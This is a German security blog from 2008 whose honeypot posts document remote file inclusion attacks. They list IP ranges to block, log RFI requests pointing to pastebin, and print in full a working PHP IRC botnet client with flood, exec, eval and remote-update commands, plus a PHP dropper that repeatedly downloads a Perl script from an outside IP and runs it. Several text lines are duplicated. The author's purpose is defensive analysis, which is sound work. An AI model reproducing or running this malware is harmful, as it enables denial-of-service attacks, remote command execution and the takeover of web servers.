Friday, October 3. 2008
onspeed.com als Beschleuniger für hacker
onspeed.com ist laut deren Webseite ein Dienst,
der langsame Verbindungen beim browsen beschleunigen soll.
Wenn ich dies richtig verstanden habe,
bekommt man für knapp 25 Dollars Zugang zu einem Service,
der Browseranfragen aus einem Cache mit gepackten Daten beantwortet. (deflate)
Ebenso ist es aber dadurch möglich,
RFI scans mit einer ziemlich hohen Geschwindigkeit durchzuführen.
Das soll jetzt keine Werbung sein.
Ich meine das ernst.
onspeed hat bisher nicht auf meine mails geantwortet,
daher nun meine Empfehlung an alle Admins, Hostmaster und was immer folgende domains/IPs zu blocken:
der langsame Verbindungen beim browsen beschleunigen soll.
Wenn ich dies richtig verstanden habe,
bekommt man für knapp 25 Dollars Zugang zu einem Service,
der Browseranfragen aus einem Cache mit gepackten Daten beantwortet. (deflate)
Ebenso ist es aber dadurch möglich,
RFI scans mit einer ziemlich hohen Geschwindigkeit durchzuführen.
Das soll jetzt keine Werbung sein.
Ich meine das ernst.
onspeed hat bisher nicht auf meine mails geantwortet,
daher nun meine Empfehlung an alle Admins, Hostmaster und was immer folgende domains/IPs zu blocken:
Stand 3.10.2008 17:05 domain IP --------------------------------------------------------- navaho.onspeed.com 72.3.137.82 yuma.onspeed.com 72.3.137.83 vanadium.onspeed.com 83.138.172.72 chromium.onspeed.com 83.138.172.76 silicon.onspeed.com 212.100.250.218 sulphur.onspeed.com 212.100.250.225 aluminium.onspeed.com 212.100.250.217 nickel.onspeed.com 212.100.250.230Ich persönlich habe kein Problem damit etwas grosszügiger zu sein:
72.3.137.0/24 83.138.172.0/24 212.100.250.0/24Hier ein Auszug aus der abuse mail:
Saturday, September 13. 2008
[honeyd] rfi - listen
Der Andrang ist inzwischen so gross geworden, mich zum Opfer zu machen,
sodass ich während ich Skripte versuche zu erstellen,
die Situation sich schon wieder dermassen geändert hat,
dass ich das Konzept wieder neu überdenken muss ;)
sodass ich während ich Skripte versuche zu erstellen,
die Situation sich schon wieder dermassen geändert hat,
dass ich das Konzept wieder neu überdenken muss ;)
Saturday, August 9. 2008
[malware] RFI Attacken mit Hilfe von pastebin.ubuntu.com
Ob ubuntu Eure bevorzugte Distribution ist, sei einmal dahingestellt.
Offensichtlich wird jedoch der pastebin im "plain" dafür ausgenutzt webseiten zu übernehmen.
Schauen wir uns einmal diesen letzten "pastebin" an:
Offensichtlich wird jedoch der pastebin im "plain" dafür ausgenutzt webseiten zu übernehmen.
CODE:
cat rfi.txt |grep pastebin
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33902/plain/???
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33897/plain/?
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/?
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33946/plain/?
/doc///vwar/backup/errors.php?error=http://pastebin.ubuntu.com/35446/plain/???
Schauen wir uns einmal diesen letzten "pastebin" an:
CODE:
<?php
ignore_user_abort(TRUE);
set_time_limit(0);
error_reporting(E_ALL);
class bMain
{
var $config = array(
// "prefix" => "HOMOVAN|",
"maxnumbers" => 5,
"maxident" => 6,
"trigger" => ".",
"modes" => "-ix",
"adminhosts" => array("i.love.ircsluts.net"),
"sockbuffer" => 512,
"rejoindelay" => 900,
"cpingdelay" => 10,
"chessburstudp" => 5000,
"chessbursttcp" => 100,
"httpburst" => 20,
);
var $servers = array(
array(
"host" => "Y2FydGVyLndpZ2d5bmV0Lm9yZy51aw==",
"port" => "OTAwMA==",
"channels" => array("I21vYmZpZ2dh"),
"control" => true,
),
);
var $bots = array();
var $lastrejointime;
function bMain()
{
$this->lastrejointime = time();
}
function start()
{
foreach ($this->servers as $srv)
{
$bot = new bBot;
$bot->setnick($this->generatenick());
$bot->setcontrol($srv["control"]);
foreach ($srv["channels"] as $chan) $bot->channels[] = base64_decode($chan);
$bot->setdestination(base64_decode($srv["host"]),base64_decode($srv["port"]),$this->generateident());
$bot->lastreconnect = time();
$bot->connect();
$this->bots[] = $bot;
}
while (1) $this->heartbeat();
}
function heartbeat()
{
if (time()-$this->lastrejointime >= $this->config["rejoindelay"])
{
$this->lastrejointime = time();
$botcnt = count($this->bots);
for ($i=0; $i<$botcnt; $i++) $this->bots[$i]->joinchans();
}
foreach ($this->bots as $botlol) {
if ($botlol->isconnected()) $botlol->parsebuffer();
elseif (time()-10 > $botlol->lastreconnect) {
/* $botlol->lastreconnect = time();
$botlol->setnick($this->generatenick());
$botlol->connect();*/
exit();
}
}
}
function generatenick()
{
/* $randnick = $this->config["prefix"];
for ($i=0;$i<$this->config["maxnumbers"];$i++) $randnick .= mt_rand(0,9);
return $randnick;*/
$nprefixes = array("Wolf","Wolfeh","Wolfy","Dog","Doggy","Doggy","Cheetah","Yiff","Yiffy","Lion","Lioness","Tiger","Tigah","Aardvark","Badger","Beaver","Cat","Kitty","Deer","Donkey","Donkeh","Bear","Grizzly","Hamster","Pikachu","Mudkip","Goat","Coyote","Flame","Mustang","Lynx","Stallion","Tapir","Panda","Pony","Bunny","Dawg","Inu","Neko","Usagi","Kitsune","Kitune","Tails","Horny","Kinky","Yiffy","Sexy","Manly","Female","Horneh","Sex","Sxc","Flame","Viper","Fire","Desu","Angry","Happy","Playful","Naughty","Good","Speed","Snow","Beach","Windy","Dream","Dreamer","Afro","Skritchy","Lovely","Sonic");
$newnick = $nprefixes[array_rand($nprefixes)].$nprefixes[array_rand($nprefixes)];
for ($i=0; $i<mt_rand(1,$this->config["maxnumbers"]); $i++) $newnick .= mt_rand(0,9);
return strtolower($newnick);
}
function generateident()
{
$alph = range("a","z");
$randident = "";
for($i = 0;$i<$this->config["maxident"];$i++) $randident .= $alph[rand(0,25)];
return $randident;
}
function activeconnections()
{
$concount = 0;
foreach ($this->bots as $bot)
{
if ($bot->isconnected()) $concount++;
}
return $concount;
}
function startchess($t, $h, $p, $ps, $ti)
{
/* if (strlen($this->chessfile) < 1) $this->chessfile = $this->createchessfile();
$this->spawnfakethreads("php ".$this->chessfile." ".base64_encode($h)." ".base64_encode($p)." ".base64_encode($ps)." ".base64_encode($t), intval($th));*/
$ho = "";
if ($t == "udp") {
$burst = $this->config["chessburstudp"];
$ho = "udp://";
//print("using udp $burst\n");
}
elseif ($t == "tcp") {
$burst = $this->config["chessbursttcp"];
$ho = "tcp://";
//print("using tcp $burst\n");
}
//else print("else $t\n");
$ho .= $h;
$lastping = 0;
$out = "";
for($i=0;$i<$ps;$i++) $out .= chr(mt_rand(1, 256));
$i = 0;
$pakcnt = 0;
$timei = time();
while (1) {
if ($p < 1 || $p > 65000) $po = mt_rand(1,65000);
else $po = $p;
@$fp = fsockopen($ho, $po, $errno, $errstr, 1);
if ($fp) {
fwrite($fp, $out);
fclose($fp);
}
$i++;
if ($i >= $burst) {
$ctime = time();
if ($ctime - $lastping >= $this->config["cpingdelay"]) {
foreach ($this->bots as $botlol) {
$botlol->raw("PING");
}
$lastping = $ctime;
}
$pakcnt += $i;
if ($ctime - $timei >= $ti) return $pakcnt;
else $i = 0;
}
}
}
function starthttp($url, $secs)
{
$agents = array(
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.4/Megaupload x.0",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20030306 Camino/0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0",
"Opera/9.50 (Windows NT 5.1; U; en-GB)",
"Opera/9.50 (Windows NT 5.1; U; en-US)",
);
$parsed = parse_url($url);
if (!$parsed) return false;
$servip = gethostbyname($parsed['host']);
if (!$parsed['query']) $parsed['query'] = "";
$lastping = 0;
$i = 0;
$reqcnt = 0;
$timei = time();
while (1) {
if ($sock = fsockopen($servip, 80, $errno, $errstr, 1)) {
$packet = "GET ".$parsed['path']."?".$parsed['query']." HTTP/1.1\r\n"
. "User-Agent: ".$agents[array_rand($agents)]."\r\n"
. "Host: ".$parsed['host']."\r\n"
. "Connection: Keep-Alive\r\n\r\n";
fwrite($sock, $packet);
fclose($sock);
}
$i++;
if ($i >= $this->config["httpburst"]) {
$ctime = time();
if ($ctime-$lastping >= $this->config["cpingdelay"]) {
foreach ($this->bots as $botlol) {
$botlol->raw("PING");
}
$lastping = $ctime;
}
$reqcnt += $i;
if ($ctime - $timei >= $secs) return $reqcnt;
else $i = 0;
}
}
}
/* function spawnfakethreads($cmd, $qty)
{
if (stristr(PHP_OS, "WIN")) $fullcmd = "start $cmd";
else $fullcmd = "$cmd > /dev/null 2>&1 &";
for ($i=0; $i<$qty; $i++) {
shell_exec($fullcmd);
}
}*/
function update($url, $killprocess, $runcmd, $sourcebot, $source)
{
//$starttime = time();
$updcode = file_get_contents($url);
if ($updcode) $sourcebot->say("Got ".strlen($updcode)." bytes", $source);
else return false;
//$destfile = $this->randtempfile();
$destfile = tempnam("/tmp", "pdata");
$fh = fopen($destfile, "w");
fwrite($fh, $updcode);
fclose($fh);
$this->spawnfakethreads($runcmd." ".$destfile, 1);
unlink($destfile);
if ($killprocess = 1) die("Updating");
}
/* function createchessfile()
{
$tmpfile = tempnam("datab", "/tmp");
$fh = fopen($tmpfile, "w");
fwrite($fh, base64_decode($this->csrc));
fclose($fh);
return $tmpfile;
}*/
}
class bBot
{
var $currenthost;
var $currentport;
var $currentident;
var $currentnick = "unset";
var $channels = array();
var $allowcontrol = false;
var $socket;
var $lastreconnect;
function setdestination($host, $port, $ident)
{
$this->currenthost = $host;
$this->currentport = $port;
$this->currentident = $ident;
}
function connect()
{
$this->socket = fsockopen($this->currenthost, $this->currentport, $errno, $errstr, 5);
if (feof($this->socket))
{
print("connection error: $errstr [$errno]\n");
return false;
}
stream_set_blocking($this->socket, 0);
$this->raw("USER ".$this->currentident." 127.0.0.1 localhost :".php_uname()."");
$this->raw("NICK ".$this->currentnick);
return true;
}
function disconnect()
{
$this->raw("QUIT :Disconnecting");
fclose($this->socket);
}
function setnick($nick, $set = false)
{
if ($set) $this->raw("NICK $nick");
$this->currentnick = $nick;
}
function setcontrol($control)
{
$this->allowcontrol = $control;
}
function joinchans()
{
foreach ($this->channels as $chan) $this->raw("JOIN $chan");
}
function raw($text)
{
fwrite($this->socket, $text."\r\n");
}
function say($text, $target, $notice = false)
{
if (!$notice) $this->raw("PRIVMSG $target :$text");
else $this->raw("NOTICE $target :$text");
}
function isconnected()
{
if ($this->socket && !feof($this->socket)) return true;
else return false;
}
function parsebuffer()
{
global $mainclass;
$buf = trim(fgets($this->socket, $mainclass->config["sockbuffer"]));
if (!$buf || strlen($buf) < 3)
{
usleep(100000);
return false;
}
if (substr($buf,0,6) == "PING :") $this->raw("PONG :".substr($buf,6));
$cmd = explode(" ", $buf);
if (isset($cmd[1]))
{
switch ($cmd[1])
{
case "001":
$this->raw("MODE ".$this->currentnick." :".$mainclass->config["modes"]);
$this->joinchans();
break;
case "433":
$this->raw("NICK {$this->currentnick}");
break;
case "PRIVMSG":
if (!$this->allowcontrol) break;
$host = explode("@", $cmd[0]);
$text = substr($cmd[3], 1);
for ($i=4; $i<1024; $i++) {
if (isset($cmd[$i])) $text .= " ".$cmd[$i];
else break;
}
if (substr($text, 0, 1) == $mainclass->config["trigger"]) {
$textnoprefix = substr($text, 1);
$textsplit = explode(" ", $textnoprefix);
//if ($host[1] == $mainclass->config["adminhost"]) $this->parsecommand($textsplit, $cmd[2], $cmd[0]);
foreach ($mainclass->config["adminhosts"] as $admhost) {
if (stristr($host[1], $admhost)) {
$this->parsecommand($textsplit, $cmd[2], $cmd[0]);
break;
}
}
}
break;
case "KICK":
if ($cmd[3] == $this->currentnick) $this->joinchans();
break;
}
}
}
function parsecommand($args, $source, $hostname = "")
{
global $mainclass;
$numargs = count($args)-1;
switch ($args[0]) {
// ADMIN COMMANDS GO HERE
case "test":
$this->say("hello", $source);
break;
case "status":
$this->say("Connected to ".$mainclass->activeconnections()." server(s).", $source);
break;
case "info":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->say("$uname (safe: $safemode)", $source);
if ($_SERVER['SERVER_NAME'] && $_SERVER['REQUEST_URI']) $this->say("http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "", $source);
break;
case "die":
$this->raw("QUIT :Die command received from $source");
die();
break;
case "chess":
if ($numargs < 5) {
$this->say("Usage: ".$mainclass->config["trigger"]."chess [type (tcp/udp)] [host] [port] [bytes] [secs]", $source);
break;
}
if ($args[1] != "tcp" && $args[1] != "udp") {
$this->say("Invalid type specified", $source);
break;
}
$this->say("Chess starting", $source);
$psizeint = intval($args[4]);
$secsint = intval($args[5]);
$pakits = $mainclass->startchess($args[1], $args[2], intval($args[3]), $psizeint, $secsint);
$mbsent = round(($psizeint*$pakits)/1048576, 2);
$this->say("Chess finished (".$args[1].") - host: ".$args[2].":".$args[3].", psize: ".$args[4].", secs: ".$args[5].", sent: ".$mbsent." megabytes at ".round($mbsent/$secsint, 2)." mb/s", $source);
break;
/* case "stopchess":
if ($mainclass->chessrunning) $this->say("Stopping chess!", $source);
else $this->say("You're not playing chess you asshat", $source);
$mainclass->stopchess = true;
break;*/
case "update":
if ($numargs < 3) {
$this->say("Usage: ".$mainclass->config["trigger"]."update [url] [run with] [kill this process (0/1)]", $source);
break;
}
$this->say("Starting update download...", $source);
if (!$mainclass->update($args[1], $args[2], intval($args[3]), $this, $source)) $this->say("Error downloading file, aborting.", $source);
break;
case "connections":
foreach ($mainclass->bots as $botid => $botlol) if ($botlol->isconnected()) $this->say("(\2".$botid."\2) ".$botlol->currenthost.":".$botlol->currentport." - ".$botlol->currentnick, $source);
break;
case "connect":
if ($numargs < 5) {
$this->say("Usage: ".$mainclass->config["trigger"]."connect [host] [port] [nick (0=rand)] [channels (,)] [control (0,1)]", $source);
break;
}
$this->say("Connecting to ".$args[1]."...", $source);
$newbot = new bBot;
if ($args[3] != "0") $newbot->setnick($args[3]);
else $newbot->setnick($mainclass->generatenick());
if ($args[5] == "1") $newbot->setcontrol(true);
else $newbot->setcontrol(false);
$newchannels = explode(",", $args[4]);
foreach ($newchannels as $newchan) $newbot->channels[] = $newchan;
$newbot->setdestination($args[1],$args[2],$mainclass->generateident());
$newbot->connect();
if ($newbot->isconnected()) {
$mainclass->bots[] = $newbot;
$this->say("Connection successful, use "disconnect" to disconnect.", $source);
}
else $this->say("Connection error!", $source);
break;
case "disconnect":
if ($numargs < 1) {
$this->say("Usage: ".$mainclass->config["trigger"]."disconnect [conid]", $source);
break;
}
$conid = intval($args[1]);
if (strlen($args[1]) > 2 || !$mainclass->bots[$conid]) {
$this->say("Invalid connection ID", $source);
break;
}
if ($mainclass->bots[$conid]->allowcontrol) {
$ctrlbots = 0;
foreach ($mainclass->bots as $bawt) {
if ($bawt->allowcontrol) $ctrlbots++;
}
if ($ctrlbots <= 1) {
$this->say("Cannot disconnect while only one control connection remaining, use "die"", $source);
break;
}
}
if (count($mainclass->bots) <= 1) {
$this->raw("QUIT :Final connection dropped, quitting");
die();
break;
}
if ($mainclass->bots[$conid]) {
$mainclass->bots[$conid]->disconnect();
unset($mainclass->bots[$conid]);
sort($mainclass->bots);
$this->say("Connection ".$args[1]." disconnected", $source);
}
else $this->say("Invalid connection ID", $source);
break;
case "exec":
$txt = "";
for ($i=1; $i<1024; $i++) {
if (isset($args[$i])) $txt .= $args[$i]." ";
else break;
}
$ph = popen($txt." 2>&1", "r");
$read = fread($ph, 8192);
$out = explode("\n", $read);
pclose($ph);
foreach ($out as $line)
{
$this->say(trim($line), $source);
//sleep(1);
}
break;
case "eval":
ob_start();
eval($args);
$outa = explode("\n", ob_get_flush());
foreach ($outa as $line)
{
$this->say(trim($line), $source);
//sleep(1);
}
ob_end_flush();
break;
case "http":
if ($numargs < 2) {
$this->say("Usage: ".$mainclass->config["trigger"]."http [url] [secs]", $source);
break;
}
$this->say("HTTP request flood starting", $source);
$requests = $mainclass->starthttp($args[1], intval($args[2]));
if ($requests && $requests > 0) $this->say("HTTP flood finished - sent ".$requests." requests", $source);
else $this->say("HTTP flood error, no requests sent", $source);
break;
}
}
}
$mainclass = new bMain;
$mainclass->start();
?>
interessant die base 64 Kodierung der server und channel Variablen.
Saturday, June 21. 2008
[malware]adu/idku.txt??
...seitdem sich eine meiner domains in den suchmaschinen etabliert hat,
kommen einige sachen, die ich erst mal "beantworten" muss :)
adu/idku.txt Google Search
kommen einige sachen, die ich erst mal "beantworten" muss :)
adu/idku.txt Google Search
CODE:
<?
@passthru('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;lwp-downloadhttp://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
